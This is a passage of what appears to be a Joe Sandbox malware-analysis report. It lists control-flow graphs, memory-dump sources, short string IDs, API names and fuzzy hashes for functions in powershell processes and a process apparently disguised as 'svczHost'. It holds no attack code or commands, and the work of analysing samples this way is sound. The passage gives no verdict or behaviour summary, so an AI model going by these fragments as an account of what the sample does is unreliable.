515->401 523 7ffccf7527e7-7ffccf7527f1 515->523 516->509 524 7ffccf7527f3-7ffccf752808 523->524 525 7ffccf75280a-7ffccf75281a 523->525 524->525 525->401 526 7ffccf752820-7ffccf75282a 525->526 528 7ffccf752843-7ffccf75287b 526->528 529 7ffccf75282c-7ffccf752839 526->529 537 7ffccf752880-7ffccf7528c0 528->537 529->528 533 7ffccf75283b-7ffccf752841 529->533 533->528 537->418 541 7ffccf7528c6-7ffccf7528dc 537->541 541->457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3769713044.00007FFCCF750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf750000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p!G$pUK$xA
                                                                                                                            • API String ID: 0-2629844671
                                                                                                                            • Opcode ID: 826a7683de75663f148554a58ecabe43323389a35ca41ef3ce0d5b3af9bd71e3
                                                                                                                            • Instruction ID: d865d93b7527833c542f299caa65159a01a8eb7e5113bcb064dcb3f4ad8650c3
                                                                                                                            • Opcode Fuzzy Hash: 826a7683de75663f148554a58ecabe43323389a35ca41ef3ce0d5b3af9bd71e3
                                                                                                                            • Instruction Fuzzy Hash: 5052E13590DADD8FEB96DF2888A46647BE1FF56310F1800BEC04DCB193DA29AC46C761
                                                                                                                            Function 00007FFCCF75299B Relevance: 3.1, Strings: 2, Instructions: 591COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 543 7ffccf75299b-7ffccf7529fe 549 7ffccf752a00-7ffccf752a51 543->549 550 7ffccf752a52-7ffccf752abb 543->550 562 7ffccf752ad3-7ffccf752ae7 550->562 563 7ffccf752abd-7ffccf752ad2 550->563 565 7ffccf752af0-7ffccf752aff 562->565 566 7ffccf752ae9 562->566 567 7ffccf752b01 565->567 568 7ffccf752b08-7ffccf752b17 565->568 566->565 567->568 569 7ffccf752b20-7ffccf752b2f 568->569 570 7ffccf752b19 568->570 571 7ffccf752b31 569->571 572 7ffccf752b38-7ffccf752b47 569->572 570->569 571->572 573 7ffccf752b50-7ffccf752baa 572->573 574 7ffccf752b49 572->574 575 7ffccf752bab-7ffccf752bda 573->575 574->573 578 7ffccf752bdc-7ffccf752c0f 575->578 580 7ffccf752d73-7ffccf752e27 578->580 581 7ffccf752c15-7ffccf752c1f 578->581 619 7ffccf752e30-7ffccf752e3f 580->619 620 7ffccf752e29 580->620 582 7ffccf752c21-7ffccf752c39 581->582 583 7ffccf752c3b-7ffccf752c48 581->583 582->583 589 7ffccf752c4e-7ffccf752c51 583->589 590 7ffccf752d08-7ffccf752d12 583->590 589->590 594 7ffccf752c57-7ffccf752c5f 589->594 592 7ffccf752d14-7ffccf752d24 590->592 593 7ffccf752d25-7ffccf752d70 590->593 593->580 594->580 597 7ffccf752c65-7ffccf752c6f 594->597 599 7ffccf752c71-7ffccf752c7f 597->599 600 7ffccf752c89-7ffccf752c8f 597->600 599->600 606 7ffccf752c81-7ffccf752c87 599->606 600->590 604 7ffccf752c91-7ffccf752c94 600->604 604->590 605 7ffccf752c96-7ffccf752c99 604->605 607 7ffccf752cc0 605->607 608 7ffccf752c9b-7ffccf752cbe 605->608 606->600 611 7ffccf752cc2-7ffccf752cc4 607->611 608->611 611->590 615 7ffccf752cc6-7ffccf752cdc 611->615 621 7ffccf752ce3-7ffccf752ceb 615->621 625 7ffccf752e41 619->625 626 7ffccf752e48-7ffccf752e6b 619->626 620->619 623 7ffccf752cf3-7ffccf752cf8 621->623 624 7ffccf752ced-7ffccf752cf1 621->624 627 7ffccf752cf9-7ffccf752d07 623->627 624->627 625->626
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3769713044.00007FFCCF750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf750000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: r6*,$r6*,
                                                                                                                            • API String ID: 0-3900694178
                                                                                                                            • Opcode ID: 56c40320971494da5842795c790a77698440edef587f9037b03580a97a0b9adc
                                                                                                                            • Instruction ID: 05c32788f2dfc253e83a087293395c03205e578d279b3ccfd13682777122955b
                                                                                                                            • Opcode Fuzzy Hash: 56c40320971494da5842795c790a77698440edef587f9037b03580a97a0b9adc
                                                                                                                            • Instruction Fuzzy Hash: B902263190D7D95FE757AB3998666A53FE0EF43220B0801FFD489CB0A3E919AC46C761
                                                                                                                            Function 00007FFCCF2FD35C Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 695 7ffccf2fd35c-7ffccf2fd384 697 7ffccf2fd38a-7ffccf2fd394 695->697 698 7ffccf2fd5ec-7ffccf2fd6ab 695->698 699 7ffccf2fd396-7ffccf2fd3a3 697->699 700 7ffccf2fd3ad-7ffccf2fd3b2 697->700 699->700 707 7ffccf2fd3a5-7ffccf2fd3ab 699->707 702 7ffccf2fd3b8-7ffccf2fd3bb 700->702 703 7ffccf2fd590-7ffccf2fd59a 700->703 708 7ffccf2fd3d2 702->708 709 7ffccf2fd3bd-7ffccf2fd3d0 702->709 705 7ffccf2fd5a9 703->705 706 7ffccf2fd59c-7ffccf2fd5a8 703->706 710 7ffccf2fd5aa-7ffccf2fd5b9 705->710 707->700 711 7ffccf2fd3d4-7ffccf2fd3d6 708->711 709->711 713 7ffccf2fd5bb-7ffccf2fd5bf 710->713 714 7ffccf2fd5c6-7ffccf2fd5e9 710->714 711->703 716 7ffccf2fd3dc-7ffccf2fd410 711->716 713->714 714->698 728 7ffccf2fd427 716->728 729 7ffccf2fd412-7ffccf2fd425 716->729 731 7ffccf2fd429-7ffccf2fd42b 728->731 729->731 731->703 732 7ffccf2fd431-7ffccf2fd439 731->732 732->698 734 7ffccf2fd43f-7ffccf2fd449 732->734 735 7ffccf2fd44b-7ffccf2fd463 734->735 736 7ffccf2fd465-7ffccf2fd475 734->736 735->736 736->703 740 7ffccf2fd47b-7ffccf2fd4ac 736->740 740->703 745 7ffccf2fd4b2-7ffccf2fd4de 740->745 749 7ffccf2fd509 745->749 750 7ffccf2fd4e0-7ffccf2fd507 745->750 751 7ffccf2fd50b-7ffccf2fd50d 749->751 750->751 751->703 752 7ffccf2fd513-7ffccf2fd51b 751->752 754 7ffccf2fd52b 752->754 755 7ffccf2fd51d-7ffccf2fd527 752->755 758 7ffccf2fd530-7ffccf2fd540 754->758 756 7ffccf2fd529 755->756 757 7ffccf2fd547-7ffccf2fd576 755->757 756->758 765 7ffccf2fd57d-7ffccf2fd58f 757->765 758->710 762 7ffccf2fd542-7ffccf2fd545 758->762 762->757
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3754334771.00007FFCCF2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf2f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: HRK
                                                                                                                            • API String ID: 0-3817089728
                                                                                                                            • Opcode ID: a42ed693d86eba2e0ada6935a2724cf98518358ca2e67ad45cee9980764dac38
                                                                                                                            • Instruction ID: 391d98d83a261b8d78df5af25bd51848933155e262378a56b5a900ebb3e884a3
                                                                                                                            • Opcode Fuzzy Hash: a42ed693d86eba2e0ada6935a2724cf98518358ca2e67ad45cee9980764dac38
                                                                                                                            • Instruction Fuzzy Hash: 28C12531A2DAED4FFB95EB2848656B97BA0FF45314B4800BEE84DC7193DA18AC05C771
                                                                                                                            Function 00007FFCCF22E674 Relevance: 1.6, APIs: 1, Instructions: 113libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 766 7ffccf22e674-7ffccf22e67b 767 7ffccf22e67d-7ffccf22e685 766->767 768 7ffccf22e686-7ffccf22e6ef 766->768 767->768 771 7ffccf22e6f1-7ffccf22e6f6 768->771 772 7ffccf22e6f9-7ffccf22e72b LoadLibraryExW 768->772 771->772 773 7ffccf22e72d 772->773 774 7ffccf22e733-7ffccf22e75a 772->774 773->774
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3752266101.00007FFCCF220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF220000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf220000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 8152457354c4f4e942491fe38fc395f8f58c255bf3ab27ed9ed650020445c330
                                                                                                                            • Instruction ID: afb1478ab4830a802797caff2a59c2ea47b24e08dd68d5e6db2903a64d76ffdf
                                                                                                                            • Opcode Fuzzy Hash: 8152457354c4f4e942491fe38fc395f8f58c255bf3ab27ed9ed650020445c330
                                                                                                                            • Instruction Fuzzy Hash: 0931F33190CA5C9FDB19DBACC849BE9BBE0FB52320F04422ED049C3591DB64A405CBE1
                                                                                                                            Function 00007FFCCF751E7C Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3769713044.00007FFCCF750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf750000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: pvF,
                                                                                                                            • API String ID: 0-2398940930
                                                                                                                            • Opcode ID: 4ae16c59c0598349cb73755fc85cc5cca29585aba95b47a52c46833bb6a16be5
                                                                                                                            • Instruction ID: a6de29d68d16a87dc2fa50c56dbe34b3db340d2cc6b79d0f07a0e2d929255365
                                                                                                                            • Opcode Fuzzy Hash: 4ae16c59c0598349cb73755fc85cc5cca29585aba95b47a52c46833bb6a16be5
                                                                                                                            • Instruction Fuzzy Hash: A8A12331A0EAD94FEBA6EB2988545B57BE1EF56321B0901FBD04CC71A3DA58DC05C3B1
                                                                                                                            Function 00007FFCCF2FB408 Relevance: .5, Instructions: 457COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 860 7ffccf2fb408-7ffccf2fb47f 868 7ffccf2fb486-7ffccf2fb497 860->868 869 7ffccf2fb481 860->869 871 7ffccf2fb499 868->871 872 7ffccf2fb49e-7ffccf2fb4c0 868->872 869->868 870 7ffccf2fb483 869->870 870->868 871->872 873 7ffccf2fb49b 871->873 874 7ffccf2fb514-7ffccf2fb536 872->874 875 7ffccf2fb4c2-7ffccf2fb4c3 872->875 873->872 876 7ffccf2fb665-7ffccf2fb727 874->876 877 7ffccf2fb53c-7ffccf2fb546 874->877 875->874 917 7ffccf2fb729 876->917 918 7ffccf2fb72e-7ffccf2fb73f 876->918 878 7ffccf2fb548-7ffccf2fb555 877->878 879 7ffccf2fb55f-7ffccf2fb564 877->879 878->879 886 7ffccf2fb557-7ffccf2fb55d 878->886 881 7ffccf2fb56a-7ffccf2fb56d 879->881 882 7ffccf2fb605-7ffccf2fb60f 879->882 887 7ffccf2fb584 881->887 888 7ffccf2fb56f-7ffccf2fb582 881->888 884 7ffccf2fb611-7ffccf2fb61f 882->884 885 7ffccf2fb620-7ffccf2fb630 882->885 890 7ffccf2fb632-7ffccf2fb636 885->890 891 7ffccf2fb63d-7ffccf2fb662 885->891 886->879 892 7ffccf2fb586-7ffccf2fb588 887->892 888->892 890->891 891->876 892->882 896 7ffccf2fb58a-7ffccf2fb590 892->896 899 7ffccf2fb592-7ffccf2fb59f 896->899 900 7ffccf2fb5ac-7ffccf2fb5ce 896->900 899->900 905 7ffccf2fb5a1-7ffccf2fb5aa 899->905 908 7ffccf2fb5d5-7ffccf2fb5dc 900->908 905->900 910 7ffccf2fb5e2-7ffccf2fb5ea 908->910 912 7ffccf2fb5f2-7ffccf2fb5f7 910->912 913 7ffccf2fb5ec-7ffccf2fb5f0 910->913 914 7ffccf2fb5f8-7ffccf2fb604 912->914 913->914 917->918 919 7ffccf2fb72b 917->919 920 7ffccf2fb746-7ffccf2fb7cd 918->920 921 7ffccf2fb741 918->921 919->918 921->920 923 7ffccf2fb743 921->923 923->920
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3754334771.00007FFCCF2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf2f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 251b083e2a9f259420aaa5968456b23e3c689f440c06580ec472f410877d7802
                                                                                                                            • Instruction ID: 83f91d0cb14836f10b52213177479c9d178161003aec837679dd61ba64a28e51
                                                                                                                            • Opcode Fuzzy Hash: 251b083e2a9f259420aaa5968456b23e3c689f440c06580ec472f410877d7802
                                                                                                                            • Instruction Fuzzy Hash: 29D1166291E7EA4FE7569B3858645A47FE0EF57320B0911FBD089CB1A3DA189C06C372
                                                                                                                            Function 00007FFCCF2FB204 Relevance: .2, Instructions: 242COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3754334771.00007FFCCF2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf2f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 68baa7cb1005d7526a40d1fef749f0d91de6985bf204a47e6ca76d948f11de09
                                                                                                                            • Instruction ID: 12935187b2b0079eb7f1f651c6500d50455097657bd07b67e61cfa348638351b
                                                                                                                            • Opcode Fuzzy Hash: 68baa7cb1005d7526a40d1fef749f0d91de6985bf204a47e6ca76d948f11de09
                                                                                                                            • Instruction Fuzzy Hash: EA61F632A1DAAE4FF7A99B1C98555B936D1EF85321B04207FD45EC3192CE18EC05C7A1
                                                                                                                            Function 00007FFCCF10EE9A Relevance: .2, Instructions: 159COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 970 7ffccf10ee9a-7ffccf10eed0 972 7ffccf10eed2-7ffccf10eee0 970->972 973 7ffccf10eee3-7ffccf10eef1 970->973 972->973 976 7ffccf10ef21-7ffccf10ef39 973->976 977 7ffccf10eef3-7ffccf10eefb 973->977 978 7ffccf10ef4a-7ffccf10ef4c 976->978 979 7ffccf10ef3b-7ffccf10ef45 976->979 977->976 981 7ffccf10ef4d-7ffccf10efbb 978->981 979->981 982 7ffccf10ef47 979->982 984 7ffccf10efbd-7ffccf10efc4 981->984 982->978 985 7ffccf10efc6-7ffccf10efdf 984->985 986 7ffccf10efeb-7ffccf10f000 984->986 987 7ffccf10efe3-7ffccf10efe9 985->987 987->984
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3750598703.00007FFCCF10D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF10D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf10d000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86033634486e7cf14534bdd8e81881c8e038842d98a1e5f3391d19686421df3f
                                                                                                                            • Instruction ID: 6d4fd36868f312f59b79b7f36e4b4c93c28d3a1c8fb40400c6c48a922cb6d569
                                                                                                                            • Opcode Fuzzy Hash: 86033634486e7cf14534bdd8e81881c8e038842d98a1e5f3391d19686421df3f
                                                                                                                            • Instruction Fuzzy Hash: EE51F47140DBC88FD756DF2998459623FF0EF66350B1405EFE088CB2A3D625E846C762
                                                                                                                            Function 00007FFCCF2FB50C Relevance: .1, Instructions: 119COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 988 7ffccf2fb50c-7ffccf2fb536 991 7ffccf2fb665-7ffccf2fb727 988->991 992 7ffccf2fb53c-7ffccf2fb546 988->992 1032 7ffccf2fb729 991->1032 1033 7ffccf2fb72e-7ffccf2fb73f 991->1033 993 7ffccf2fb548-7ffccf2fb555 992->993 994 7ffccf2fb55f-7ffccf2fb564 992->994 993->994 1001 7ffccf2fb557-7ffccf2fb55d 993->1001 996 7ffccf2fb56a-7ffccf2fb56d 994->996 997 7ffccf2fb605-7ffccf2fb60f 994->997 1002 7ffccf2fb584 996->1002 1003 7ffccf2fb56f-7ffccf2fb582 996->1003 999 7ffccf2fb611-7ffccf2fb61f 997->999 1000 7ffccf2fb620-7ffccf2fb630 997->1000 1005 7ffccf2fb632-7ffccf2fb636 1000->1005 1006 7ffccf2fb63d-7ffccf2fb662 1000->1006 1001->994 1007 7ffccf2fb586-7ffccf2fb588 1002->1007 1003->1007 1005->1006 1006->991 1007->997 1011 7ffccf2fb58a-7ffccf2fb590 1007->1011 1014 7ffccf2fb592-7ffccf2fb59f 1011->1014 1015 7ffccf2fb5ac-7ffccf2fb5dc 1011->1015 1014->1015 1020 7ffccf2fb5a1-7ffccf2fb5aa 1014->1020 1025 7ffccf2fb5e2-7ffccf2fb5ea 1015->1025 1020->1015 1027 7ffccf2fb5f2-7ffccf2fb5f7 1025->1027 1028 7ffccf2fb5ec-7ffccf2fb5f0 1025->1028 1029 7ffccf2fb5f8-7ffccf2fb604 1027->1029 1028->1029 1032->1033 1034 7ffccf2fb72b 1032->1034 1035 7ffccf2fb746-7ffccf2fb7cd 1033->1035 1036 7ffccf2fb741 1033->1036 1034->1033 1036->1035 1038 7ffccf2fb743 1036->1038 1038->1035
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3754334771.00007FFCCF2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf2f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8bbae42b9e03816c6725a64f517b2a9238012e77fcd0163d301acf3937bfab09
                                                                                                                            • Instruction ID: 25fb8dff98d388cb0460d3ff16c34b92a06516c0c4f2206cb8d41f908aa35a69
                                                                                                                            • Opcode Fuzzy Hash: 8bbae42b9e03816c6725a64f517b2a9238012e77fcd0163d301acf3937bfab09
                                                                                                                            • Instruction Fuzzy Hash: 1731D07292DABF4FFBA89B1888556747AD1FF45310B0920BAE41EC7193DA18EC04C7B1
                                                                                                                            Function 00007FFCCF753FD4 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3769713044.00007FFCCF750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf750000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1f44d5461382d30bd0b54f3340f2babcfc8fb593b1144e5b264b4e4c6b8f3bee
                                                                                                                            • Instruction ID: 159f4d967ac61473d40c6606a80329b71097a0589d75017279d9c11860c2578d
                                                                                                                            • Opcode Fuzzy Hash: 1f44d5461382d30bd0b54f3340f2babcfc8fb593b1144e5b264b4e4c6b8f3bee
                                                                                                                            • Instruction Fuzzy Hash: 37F0A73131CF044FD744EE1CE445661B3D0FBA8315F10462FE44AC3351DB21E4818782

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFCCF2F2432 Relevance: 6.5, Strings: 5, Instructions: 281COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3754334771.00007FFCCF2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf2f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: },,$ },,$ },,$ },,$r6*,
                                                                                                                            • API String ID: 0-3999898515
                                                                                                                            • Opcode ID: d4ef1c42d590811ec6e21e7cb9380660e90e032d3052c5eff91a9668ff7bf713
                                                                                                                            • Instruction ID: 4a01d12b43f1021de5643dc0d1ce697f754420e89e822cb1d941b9042749a67d
                                                                                                                            • Opcode Fuzzy Hash: d4ef1c42d590811ec6e21e7cb9380660e90e032d3052c5eff91a9668ff7bf713
                                                                                                                            • Instruction Fuzzy Hash: 0F710522A1EBEA0FF7598F2858916B03BD1EF96350F0951BAC489C71D3DD19AC47C3A1
                                                                                                                            Function 00007FFCCF2F748C Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3754334771.00007FFCCF2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf2f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I_H$HRK$HRK$HRK
                                                                                                                            • API String ID: 0-134572383
                                                                                                                            • Opcode ID: 980df377aa66e2f29e2a419701474679ff42acc90dd15c3519f75dc5e8987442
                                                                                                                            • Instruction ID: 2bc373f1ca904c0d1230aa13f4ca10654dee21c3cf1cafb9ff3af70fe7eb8ccb
                                                                                                                            • Opcode Fuzzy Hash: 980df377aa66e2f29e2a419701474679ff42acc90dd15c3519f75dc5e8987442
                                                                                                                            • Instruction Fuzzy Hash: EB31D712B2EAFE0FFAE99BAC286527466D0EF5936170811BADC8DC61C2DD089C45C371

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FF78AD8BFE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.4146748268.00007FF78ACD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF78ACD0000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.4146717588.00007FF78ACD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4147893541.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4147893541.00007FF78B3D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4148566127.00007FF78B5E5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4148599788.00007FF78B5E6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4148599788.00007FF78B5FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4148599788.00007FF78B602000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4148599788.00007FF78B604000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 00000011.00000002.4148735522.00007FF78B607000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ff78acd0000_svczHost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                                                            • Instruction ID: 66e2b879ca977407c365833613207abebff16278a0a73a63b9cb459555eda071
                                                                                                                            • Opcode Fuzzy Hash: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                                                            • Instruction Fuzzy Hash: 9B115E26B14F068AEB00DF64E8552B973A4FB19769F940E31DA2D827A8DF38D1A4C350

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFCCF2077EC Relevance: 2.9, Strings: 2, Instructions: 445COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.3704278180.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: <1Rg$<1Rg
                                                                                                                            • API String ID: 0-916339104
                                                                                                                            • Opcode ID: 2723905b3ccb918300397aee20ef71fd86e1800e9d4345df3b68ec797fc8f047
                                                                                                                            • Instruction ID: 1e7034bac7364e0df7b8d8f45429e4c046180b1de34fa2da8ef07ddc7da36f87
                                                                                                                            • Opcode Fuzzy Hash: 2723905b3ccb918300397aee20ef71fd86e1800e9d4345df3b68ec797fc8f047
                                                                                                                            • Instruction Fuzzy Hash: 62E18031A18A8D4FEBA8DF28C8567E93AD1FF54310F14427EE84EC7291DB749941CB92
                                                                                                                            Function 00007FFCCF20859C Relevance: 2.9, Strings: 2, Instructions: 431COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.3704278180.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: <1Rg$<1Rg
                                                                                                                            • API String ID: 0-916339104
                                                                                                                            • Opcode ID: ada324789745b687fe06c1d7542f2642017ad586d46b2ef75e7fafd0b2a508c5
                                                                                                                            • Instruction ID: 9107edfa9428404d8355429472c2c75be863968601daa59b19ec96bf43c2bf01
                                                                                                                            • Opcode Fuzzy Hash: ada324789745b687fe06c1d7542f2642017ad586d46b2ef75e7fafd0b2a508c5
                                                                                                                            • Instruction Fuzzy Hash: 2BD1CF31A08A8D4FEBA8DF28C8567FA76D1FB54310F14426EE84DC7291DE749845CB92
                                                                                                                            Function 00007FFCCF2081AC Relevance: 2.8, Strings: 2, Instructions: 303COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.3704278180.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: <1Rg$<1Rg
                                                                                                                            • API String ID: 0-916339104
                                                                                                                            • Opcode ID: 5c5d6085648e9fcc32d79b1984ac374ed59e2a0489cfc16d942329842916e93b
                                                                                                                            • Instruction ID: ad1464d1f1c8dd818148d5d2ae22ba4800abc36b5e33d43c8ff1a95da57d3070
                                                                                                                            • Opcode Fuzzy Hash: 5c5d6085648e9fcc32d79b1984ac374ed59e2a0489cfc16d942329842916e93b
                                                                                                                            • Instruction Fuzzy Hash: 1BA1B331608A8D4FEBA8EF2888557FA37D1FF55311F14426EE84DC7292CE749941CB92
                                                                                                                            Function 00007FFCCF207C64 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
